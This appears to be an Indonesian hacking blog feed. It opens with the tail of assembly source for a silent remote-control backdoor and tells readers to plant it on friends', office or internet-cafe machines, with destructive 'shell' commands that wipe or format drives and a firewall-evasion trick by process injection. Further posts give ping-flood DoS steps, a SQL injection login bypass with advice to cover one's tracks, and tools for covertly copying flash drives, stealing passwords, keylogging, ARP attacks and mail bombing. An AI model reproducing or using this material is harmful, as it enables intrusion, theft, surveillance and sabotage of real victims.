mov lenn,eax

push 0

push lenn

push offset szLogon

push sock2

call send ; sambut tamu dari luar

mov eax,sockin2.sin_addr

push eax

call inet_ntoa ; terjemahkan IP x.x.x.x

mov s2IP,eax ; simpan IP dari socket 2

push offset szKonek

push offset Buffer

call lstrcpy

lea edi,Buffer

push edi

or ecx,-1

mov al,03Ah ; cari karakter ':'

repnz scasb

inc edi

; tempelkan string IP

push s2IP

push edi

call lstrcpy

push edi

call lstrlen

add edi,eax

mov word ptr [edi],0a0dh ; ganti baris

add edi,2

mov byte ptr [edi],0 ; null

pop edi

push edi

call lstrlen

mov lenn,eax

push 0

push lenn

push offset Buffer

push sock2

call send ; tampilkan string Connected : x.x.x.x -> IP address

push 0

mov eax, sizeof szMasuk

push eax

push offset szMasuk

push sock2

call send ; welcome

perintah:

push 0

push 10

push offset szPerintah

push sock2

call send ; backdoor siap dikendalikan!

push 512

push offset Buffer2

call BersihkanBuffer ; Bersihkan buffer

lea edi,Buffer2

mov KeepOF,0 ; counter anti buffer overflow

tunggu_perintah:

invoke recv,sock2,edi,500,0

test eax,eax

jz new_session

cmp eax,SOCKET_ERROR

je new_session

add edi,eax

inc KeepOF

cmp KeepOF,511

jb no_of ; jika penuisan buffer hampir mencapai 512 byte

jmp perintah ; bersihkan buffer, jaga2 biar gak terjadi

no_of: ; Buffer overflow :-)

cmp byte ptr [edi-1],08h

jne bkn_backs

xor eax,eax

mov word ptr [edi],ax

sub edi,2

bkn_backs:

cmp byte ptr [edi-1],0ah ; apakah tombol enter yang ditekan ?

jnz tunggu_perintah ; jika nggak masih nunggu perintah

; ya, terjemahkan perintah

push offset Buffer2

call Tarjim ; panggil prosedur tarjim

test eax,eax ; apakah perintah valid

jnz perintah ; jika tidak balik tungu perintah

cmp eax,2 ; apakah perintah kosong ?

je kosong ; jika ya, goto kosong

push 0

mov eax,sizeof szPerintahX

push eax

push offset szPerintahX

push sock2

call send ; tampilkan pesan kalo perintah nggak ada

jmp perintah

kosong:

push 0

push 2

push offset szKosong

push sock2

call send ; hanya ganti baris

jmp perintah

socket_error: ; trap handel jika-jika socket error

push MB_ICONERROR

push offset AppName

push offset szSocketError

push 0

call MessageBox ; tampilkan kesalahan

tamat:

push 0

call ExitProcess ; selesai.

end start

================[ EOF ]=========================================

atau kalo males ngompilasi sendiri, ini contoh yang udah jadi:

download

kalo udah coba test hasilnya, jalankan backdoor.exe dikomputer target, misal komputer teman, kantor, warnet (komputer operator lho) atau komputer pribadi, backdoor ini saya desain silent jadi kamu gak bakalan nemuin jendela macam-macam, tapi kalo kamu pake firewall pasti akan ketahuan kalo backdoor.exe telah membuka port.

setelah langkah diatas selesai kita akan melakukan telnet ke komputer target, kita bisa pake komputer lain, untuk menjalankan telnet caranya klik start>run> ketik “cmd” tanpa tanda kutip. setelah itu akan tampil jendela konsol seperti gambar 01:



Gambar 01

pada jendela konsol ketikkan “telnet x.x.x.x 2194” tanpa tanda kutip, x.x.x.x disini maksudnya IP target, contoh “telnet 192.168.0.3 2194”, 2194 disini maksudnya port yang akan kita masuki (untuk contoh backdoor ini aku gunakan port 2194). contoh Gambar 02



Gambar 02

tekan “Enter” kalo telnet berhasil maka akan tampil seperti Gambar 03 berikut:



Gambar 03

nah kalo dah gitu kita udah bisa mengendalikan komputer target dari jarak jauh, maksud seperti contoh gambar diatas adalah backdoor sudah siap melakukan perintah, ada 3 perintah yang dikenal oleh backdoor ini :

1. msgbox (untuk menampilkan pesan ke komputer target)
2. shell (untuk menjalankan aplikasi di komputer sasaran)
3. close (untuk menutup hubungan dan mematikan backdoornya)

perintah diatas bisa ditambah sendiri tergantung kreatifitas kamu.

backdoor bisa menyenangkan jika digunakan untuk mengerjai temen yang lagi ol .

cara menjalankan perintah cukup ketikkan perintah diatas pada jendela konsol, misal kita akan menampilkan pesan ke komputer target, tinggal ketikkan:

“msgbox hallo, komputer kamu dibawah kendaliku” tanpa tanda kutip, maka pada komputer target akan muncul jendela box seperti contoh Gambar 04:


Gambar 04

atau ingin memainkan musik ke komputer target dengan catatan kita tahu tempat musik yang akan kita mainkan, contoh:

“shell d:\musik ku\dream theater – endless sacrifice.mp3”

maka dikomputer target akan memainkan musik yang merdu.

atau ingin mematikan komputer target yang berbasis Wind**s 2000 keatas, dengan cara:

“shell shutdown –s –t 0 –f”

untuk merestart tinggal ganti “-s” jadi –“r” contoh:

“shell shutdown –r –t 0 –f”

Backdoor bisa menjadi sangat berbahaya jika yang dijalankan adalah perintah-perintah seperti:

“shell del /f /q /s c:\*.*” (perintah untuk menghapus semua data tanpa konfirmasi)

“shell format d: /q” (perintah untuk memformat hardisk)

note: mohon agar contoh program backdoor ini tidak digunakan untuk tindakan-tindakan yang merusak.

setelah selesai menggunakan backdoor kita bisa tutup dengan mengetikkan perintah “close”, maka backdoor di komputer target akan bunuh diri.

Cara di atas akan sia-sia apabila komputer target memasang firewall, kita perlu menambahkan kode anti firewall detection untuk menghindari deteksi dari firewall. kode anti firewall detection yang saya ketahui adalah dengan cara tehnik runtime process infection, dimana kita akan menginjeksi kode backdoor ke tubuh firewall (hampir mirip kayak DLL injection) yang sedang resident lalu meremote-nya misal pake API CreateRemoteThread, sehingga firewall akan mengangapnya sebagai sumber yang dipercaya, karena nggak mungkin firewall mencurigai dirinya sendiri sebagai backdoor :”D, Adapun beberapa firewall yang vulnerable terhadap serangan ini adalah:

1. Zone Alarm 4

2. Zone Alarm Pro 4

3. BlackIce 3

Pada pengujian yang saya lakukan, ke tiga firewall tersebut diatas bisa ditembus sistem keamanannya dan berhasil menjalankan backdoor tanpa gangguan . tapi entahlah untuk jenis firewall lain, karena saya cuma menguji 3 firewall diatas. :P

Untuk menambahkan tehnik ini kamu perlu pengetahuan dan dasar-dasar pemrograman yang cukup.

Last word

Saya hanyalah seorang biasa yang masih sangat awam dibidang IT, jadi mohon ma’af apabila saya telah melakukan kesalahan yang mungkin disebabkan karena ketidakpahaman saya atau kebodohan saya.

Untuk yang udah pada ahli, jangan pelit bagi-bagi ilmu ya..
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

Teknik sederhana melakukan serangan Denial Of Service (DoS)

Author: Maulana Malik Ibrahim // Category:
Sebenarnya untuk melakukan serangan - serangan ke suatu website tertentu memiliki variant yang banyak, ada yang menggunakan program, tetapi ada juga yang menggunakan cara simple melakukan flooding hanya dengan beberapa perintah untuk melakukan DOS hanya dengan sedikit sintax lewat command prompt.

Berikut ini cara simple dan sebenarnya cara klasik, tp lumayan buat iseng

1. Cari tahu terlebih dahulu, ip dari website yang ingin di flood jika target anda adalah sebuah website, cara mengetahuinya sangat mudah. Klik Run - Dan masukan perintah ini:
"ping www.situstarget.com -t" (tanpa tanda kutip) lalu tekan enter. Lihat pada gambar, yang di dalam kotak adalah ip target anda (dalam contoh saya nge ping ke yahoo). Jika IP target telah diketahui, abaikan step ini dan lihat run command pada step2.



2. Atau jika target anda adalah personal, anda tinggal memasukan ip si target apabila anda sudah tahu ip dari target anda. Masukan perintah ini pada run command: "ping iptarget -l 65500 -t" (tanpa kutip). Pada contoh ini, saya melakukan attack ke ip 125.***.**.*** dengan perintah sebagai berikut: ping 125.***.**.*** -l 65500 -t


3. Jika anda bingung, atau belum tau bagaimana cara mendapatkan ip seseorang, silahkan baca tutor saya lainnya disini
4. Jika perintah langkah - langkah yang anda lakukan sudah benar, tampilan akan seperti gambar di bawah ini:



Penjelasan :

# 125.***.**.*** adalah IP komputer yang akan dijadikan sasaran
# -t artinya jalankan perintah ping ini secara continue atau terus menerus
# -l 65500 artinya kirimkan paket buffer size sebesar 65500 (paket maksimal yang bisa dilakukan lewat perintah ping)


Catatan Tambahan:

Teknik ini hanya bagi pemula, dan segala resiko yang di timbulkan dari tutorial saya ini 100% adalah tanggung jawab anda. Maap jika penjelasan saya ada yang salah dan bagi para senior, mohon untuk mengkoreksinya. Saya hanya sekedar sharing informasi.
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

Crack - serial downloader

Author: Maulana Malik Ibrahim // Category:
Download Crack - Serial Downloader


Bagi anda yang terkadang kesulitan mencari crack atau serial number suatu software, mungkin ini adalah solusi yang tepat untuk anda. Tinggal masukan crack atau serial yang ingin anda cari dan lihat hasilnya.
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

Enable / Disable Registry

Author: Maulana Malik Ibrahim // Category:
Pernah melihat tampilan dibawah ini?
Download Disable / Enable Registry


mungkin bagi anda yg sering bermain di warnet atau kantor sudah tidak asing lagi dengan tampilan tersebut. Tetapi sangat menyebalkan jika registry tidak dapat dijalankan. Apalagi bagi anda yang sering utak - atik registry. Dan kali ini saya ingin memberikan sebuah tool simple untuk membuka akses terhadap registry yg sudah didisable tersebut, caranya sangat mudah, tinggal buka dan isikan dengan angka 0 (nol) untuk mengaktifkan registry, dan 1 untuk menonaktifkan kembali registry.
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

Tutorial Kedua, melakukan serangan denial of service (DoS) menggunakan Syn Attack

Author: Maulana Malik Ibrahim // Category:
Seperti yang telah saya katakan pada tutor sebelumnya, dan kali ini saya ingin membagi pengetahuan saya mengenai cara melakukan serangan dos atau ping flooding atau ip flooding, atau apalah namanya. Tool ini sangat mudah digunakan, tak perlu di install dulu dan pengoperasiannya benar-benar simple dan user friendly.

Gimana gk gampang, orang tinggal masukin ip vitcim, tekan enter, udah deh tinggal liat hasilnya anak sd juga bisa itu mah. Jika anda tidak tau cara mendapatkan ip victim, lihat tutorial saya sebelumnya mengenai tutorial sniffing menggunakan wireshark.


Gambar 1. Interface Syn Attack, tinggal anda masukan ip vitctim

Download Syn Attack

Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

UDPFlood 2.00

Author: Maulana Malik Ibrahim // Category:
UDPFlood is UDP packet sender. It sends out UDP packets to the specfied IP and port at a controllable rate. Packets can be made from a typed text string, a given number of random bytes or data from a file. Useful for server testing.

Version 2.0 does not represent any additional functionality to previous
versions of UDPFlood, it simply signifies the fact that UDPFlood has
been acquired by Foundstone (http://www.foundstone.com).

Download udp.pl 2.00

Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

Cara jail nyuri data dari Flash Disk milik orang laen.

Author: Maulana Malik Ibrahim // Category:
Terbayang gak pengen nyoba iseng ngerampok seluruh data yang ada di flash disk orang laen.. nih dengan program ini kita bisa ngopy secara diem2 seluruh isi flash disk milik orang laen.

Langkah - langkah

1. Buat dulu secara manual folder di "C:\system\error" [wajib disitu walaupun bukan drive system--tulisan wajib sama persis]

2. Ekstrak .rar program (dengan winrar atau yang sejenis) difolder yang tersembunyi. Kemudian jalan kan program dengan double klik. Liat tampilan dipojok kanan bawah bahwa program telah aktif (tanda centang warna hijau)

3. Tiap kali ada flashdisk atau kamera atau mp3/mp4 player yang dicolokkan akan OTOMATIS (TANPA TANDA & PEMBERITAHUAN) tercopy ke "C:\system\error" [akan membuat subfolder dibawahnya "tgl/bln/tahun/series", contohnya "20-06-2007_184215" .

Catatan :

- Copy ditiap komputer / warnet bila ingin mendapatkan tiap data.
- Bila ingin otomatis jalan tiap komputer dijalankan, masukkan dalam list start-up (via program files/startup atau Regedit)

DownloadRampok V.2.0


jika ada tampilan seperti ini, silahkan download missing file (lihat di kategori tutorial id boot)


Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

Hacking Database IndoBilling by Zend

Author: Maulana Malik Ibrahim // Category:
Download Advanced Hash Calculator


IndoBilling merupakan salah satu aplikasi billing yang cukup populer digunakan oleh
berbagai warnet, rental, game center maupun café-café hotspot. Indobilling termasuk
aplikasi yang bersifat client-server artinya ada aplikasi yang bertindak sebagai server dan aplikasi lainnya sebagai client dalam hal ini komputer yang digunakan operator adalah IndoBilling server sementara pengguna menggunakan IndoBilling client.

Untuk mengatur informasi berupa tarif, lama durasi serta paket2 menarik yang ditawarkan termasuk juga administrasi server yang meliputi setting tarif, manajemen operator dsb dibutuhkan aplikasi database. Database sendiri merupakan aplikasi yang berfungsi menyimpan data-data dan melakukan query terhadap data-data itu sendiri.

Salah satu contoh aplikasi database yang cukup populer yaitu MySQL yang sampai saat ini merupakan database yang bersifat open source yang banyak digunakan dalam berbagai
aplikasi misalnya web, kasir dan tentunya IndoBilling. Sampai tulisan ini dibuat
IndoBilling terbaru yakni versi 6.x masih menggunakan MySQL 3.23 dan MySQL 4.1
dengan storage engine MyISAM.

Tulisan ini dibuat hanya sebatas orang yang melakukan hacking adalah operator warnet itu sendiri , untuk pengguna warnet akan saya tulis dalam edisi selanjutnya
Sebelum melakukan hacking terlebih dahulu copy semua data yang ada di folder
C:\mysql\data pada komputer billing/operator termasuk direktori warnet dan mysql,
direktori warnet berisikan data-data setting billing, direktori mysql berisikan hak-hak akses user MySQL termasuk root. Simpanlah data-data tersebut di flashdisk kesayangan Anda.

Langkah-langkah hacking :
1. Download program MySQL (terserah versi 4.1 atau 5.0) dari
http://www.mysql.com kemudian install di komputer yang jelas bukan di komputer
operator dan install sebagai service.
2. Pilih Standard Configuration

3. Kemudian lakukan setting password root
4. Setelah MySQL terinstall dengan baik, kopikan data warnet yang telah kita copy
dari komputer billing ke direktori data di mana Anda menginstall MySQL
misalnya C:\Program Files\MySQL\data
5. Untuk memudahkan administrasi MySQL penulis menggunakan SQLyog yang
dapat di donload di http://www.webyog.com
6. Jalankan SQLyog kemudian login username sebagai root dan masukkan password
root yang telah Anda setting sewaktu menginstall MySQL. Kemudian klik connect.
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

Hacking Website menggunakan Sql Injection statement "or"

Author: Maulana Malik Ibrahim // Category:
SQL (Structured Query Language) adalah sebuah bahasa yang dipergunakan untuk mengakses data dalam basis data relasional. Bahasa ini secara de facto merupakan bahasa standar yang digunakan dalam manajemen basis data relasional. Saat ini hampir semua server basis data yang ada mendukung bahasa ini untuk melakukan manajemen datanya.

Kali ini saya ingin memberikan sedikit panduan mengenai cara hacking website menggunakan sql injection secara mudah, tanpa software dan hanya menggunakan statement "or".
Dengan cara ini, seseorang yang menamakan dirinya sebagai xnuxer pernah mendeface website kpu

Sebagaimana kita ketahui, hampir semua website meliki halaman khusus yang hanya dapat dimasuki oleh administrator. Dan tiap orang yang masuk ke directory tersebut harus memasukan username dan password sebagai admin, dan dengan tutor ini, kita mencoba untuk membye-pass password tersebut.

Baiklah untuk tidak memperpanjang mukadimah, kita langsung saja masuk pada topik. . Perhatikan penjelasan saya berikut ini: Misalnya saya memiliki website dan untuk dapat melakukan konfigurasi, maka saya harus masuk sebagai admin. Dan anggep aja usernamenya adalah Admin, dengan password kucing belang dan untuk login, maka kira - kira sql statemennya sebagai berikut:
Select * from admin where username = ‘Admin’ and Password = ‘kucing belang’

Kalo saya masuk ke root admin dan mengisikan username dan pasword tersebut, secara otomatis dan pasti saya dapat "ngutak-ngatik" website saya. Tapi bagaimana kalo gak tau passwordnya? nah ini die, inti dari tutor kali ini, dimana kita coba membyepass atau melewati perintah password tanpa mengetahui password tersebut.

Sebelumnya saya perlu sedikit menjelaskan mengenai logika pemakaian statement "or" dimana statemen tersebut dapat membalik nilai "false" menjadi "true" sehingga, walaupun kita salah memasukan password, tetap dianggap benar. Misalnya, saya menggunakan statemen or untuk masuk sebagai admin, maka statemen yang saya masukan adalah mengisi "or ‘’=" (tanpa tanda petik di awal dan akhir) pada username dan password. Hanya dengan memasukan statemen tersebut, saya dapat masuk ke website saya tanpa perlu tau apa username dan passwordnya Dan silahkan anda berimprovisasi untuk mencari root admin page pada suatu website. Atau lihat pada tulisan saya sebelumnya. Dan selamat mencoba

*Glosarry:
Statemen pada tutorial ini, sama artinya dengan command atau perintah.

Catatan: Lagi-lagi saya mengingatkan anda agar menggunakan proxy atau setidaknya jangan lakukan di tempat dimana biasa anda browsing (rumah, kantor) atau warnet yang sudah anda kenal, mendingan cari warnet yang tidak pernah anda kunjungin.. klo bisa cari dipelosok

Download Basic Sql Statement

Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

Mengembalikan password administrator pada Windows XP

Author: Maulana Malik Ibrahim // Category:
Kali ini, saya ingin meberikan tutorial cara untuk mengembalikan password admin, jika anda lupa password tersebut tanpa menggunakan software. Dengan cara ini, anda juga dapat membobol komputer seseorang tanpa perlu mengetahui password administrator..

Langkah - langkah:

1. Pertama, reboot komputer anda, dan tekan tombol f8 pada saat start up ( bios )
2. Pilih menu safe mode, kemudian klik start - run, lalu ketikan perintah berikut ini: "control userpasswords2" tanpa tanda kutip.
3. Setelah itu anda akan melihat beberapa account termasuk administrator yang berada pada komputer tersebut. Dan anda tinggal mereset password admin nya saja jika anda lupa password tersebut.
4. Klik pada administrator user account, kemudian klik Reset Password.
5. Tahap terakhir adalah, menambahkan password baru, isikan pada kotak new password dan pada kotak confirm new password, isi dengan apa yang anda isi pada kotak new password. Kemudian klik Ok.
6. Restart komputer dan jangan tekan f8 atau pilih normal mode. Dan lihat perubahannya..
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

Firefox Password Decrypter - Untuk mengetahui id dan password yahoo, friendster, youtube, dll

Author: Maulana Malik Ibrahim // Category:
Download Firefox Password Decriptor


Satu lagi program simpe untuk nge hack password. Tanpa perlu install, tinggal open, klik decrypt udah deh kliatan apa aja username sama password yang sebelumnya login pake firefox

Pada gambar diatas, yang berwarna biru merupakan password penulis,,, jd gw coret
Dan untuk mencegah agar password kita gak ikutan ke hack lebih baik menggunakan komputer sendiri atau jika menggunakan warnet, hapus dulu history dan cache terakhir. semoga tutorial kali ini bermanfaat.
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

5 in 1 Remote Attack Suite

Author: Maulana Malik Ibrahim // Category:





Download 5 in 1 Remote attack suite


Satu lagi hacking tools, komplit, 5 tool dalam satu software, tanpa install, tinggal masukan ip atau nama website victim dan bang..!!
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

Hackers Notepad, Notepad++ , Resource Hacker

Author: Maulana Malik Ibrahim // Category:
Download Hackers Notepad


Hackers Notepad, Resource Hacker, Notepad++ atau apalah namanya, yang pasti software ini merupakan salah satu software yang wajib dimiliki oleh hacker, atau yang sedang belajar "dunia hacker". Dengan software ini, kita dapat merubah source suatu program, mengganti nama author atau si pembuat, file versi, dll.

Software ini juga sering digunakan oleh para ripper atau pencuri software. Software ini support bahasa pemrograman vb, delphi, java, html, css, dan lain-lain. Yang pasti, software ini, wajib dimiliki oleh hacker atau yang sedang belajar tentang hacking. Dengan interface yg user friendly, selain itu hackers notepad juga mudah digunakan oleh pemula sekalipun.
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

Author: Maulana Malik Ibrahim // Category:
Download Win Arp Attacker

1. Scan
Melakukan scaning dan menunjukan host yg aktif dalam waktu yang singkat (2-3 detik).
Fungsi scan ini memiliki 2 mode, yaitu scan secara normal dan anti sniff scan untuk mencari siapa dan adakah yg melakukan sniffing pada jaringan kita. Selain itu, Kita dapat menyimpan dan meload komputer list yang berada pada jaringan.

2. Attack
Fungsi ini menangkap dan mengumpulkan seluruh paket dalam jaringan. Selain itu, fungsi utamanya memiliki 6 opsi:
(1) Arp Flood yaitu mengirim dan melakukan ip conflict paket ke komputer target, yang dapat membuat komputer target down dan lumpuh jika kita terlalu banyak mengirim paket.
(2) Ban Gateway adalah cara salah satu cara yang unik untuk mematikan aktifitas komputer korban dari akses ke internet. Dengan memberi perintah atau mengatakan kepada gateway bahwa komputer tersebut, memiliki mac address yg salah. Sehingga komputer target di blok akses ke internet oleh gateway
(3) IP Conflict yaitu hampir sama seperti Arp Flood dengan mengirimkan paket
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

Ngeboom email menggunakan Mail Bomber

Author: Maulana Malik Ibrahim // Category:
Download eMail Bomber


Tidak hanya yahoo messenger saja yg bisa di boom atau di boot.. kali ini saya mo share cara untuk ngeboom email. Tinggal masukan email address korban, kasih namanya terserah ,, #email will be sent: isikan berapa email yang ingin anda kirim. Agar lebih jelas, klik pada gambar untuk memperbesar .
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

Mencari password admin menggunakan admin password finder

Author: Maulana Malik Ibrahim // Category:
Download Admin Password Finder With Password Changer

Waaa,,, penulis kali ini mau kasih cara jail untuk mengetahui password admin, cocok banget ni buat yang mau iseng pas maen di warnet cara nya juga sangat mudah, pada chart's area, ceklist aja semua kotaknya agar mendapatkan hasil yang maksimal, dan pada how many chart's for start search anda bisa pilih berapa jumlah karakter untuk memulai pencarian, kalo menurut saya sih isi 4 aja coz masa iye password admin cuman 3karakter. Terus kalo passwordnya ada yg kejaring, anda tinggal ganti password tersebut dengan mengklik pada tombol switch to password changer.. Selamat mencoba, dan jail sedikit kan gpp, buat ngasih pelajaran untuk admin yang biasanya sok pinter


Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

007 Spy Software

Author: Maulana Malik Ibrahim // Category:

Download 007 Spy Software


007 Spy Software adalah salah satu spy program yang sangat komplit dan bagus. Tidak hanya seperti keyloger yang dapat mengkopi tiap password yang di ketik pada keyboard, tetapi juga memiliki 4 fungsi pengendus lainnya, seperti Website Log, Application Log, Screenshot Log, File Folders Log. Untuk dapat menggunakannya, anda harus menginstallnya terlebih dahulu, dan saya tidak mengerti cara kerjanya, tetapi software ini bekerja behind process atau hidden proses atau menyembunyikan diri sehingga tidak terdetek oleh anti keylogger, anti virus maupun anti spyware.

Dan pada saat selesai installasi, yang perlu anda ingat adalah, untuk membuka program ini, tekan tombol ctrl+alt+F7 untuk dapat mengakses dan melihat hasil spy. Satu hal lagi yang membuat program ini sempurna adalah, anda dapat mengirimkan hasil spy tersebut ke email anda. Untuk dapat menggunakan opsi ini, anda perlu melakukan pengaturan terlebih dahulu. Lihat pada gambar untuk lebih jelasnya.
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

SQL Injecktion Tools

Author: Maulana Malik Ibrahim // Category:
Injection tool v2.1

SQL Injection tool adalah tool yang digunakan untuk mengecek suatu website yang ingin di victim, apakah vulnerable untuk di hack atau tidak. Sangat mudah digunakan dan cukup efektif, siapapun bisa menggunakan tool ini, meskipun tanpa pengetahuan yg cukup tentang hacking.
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design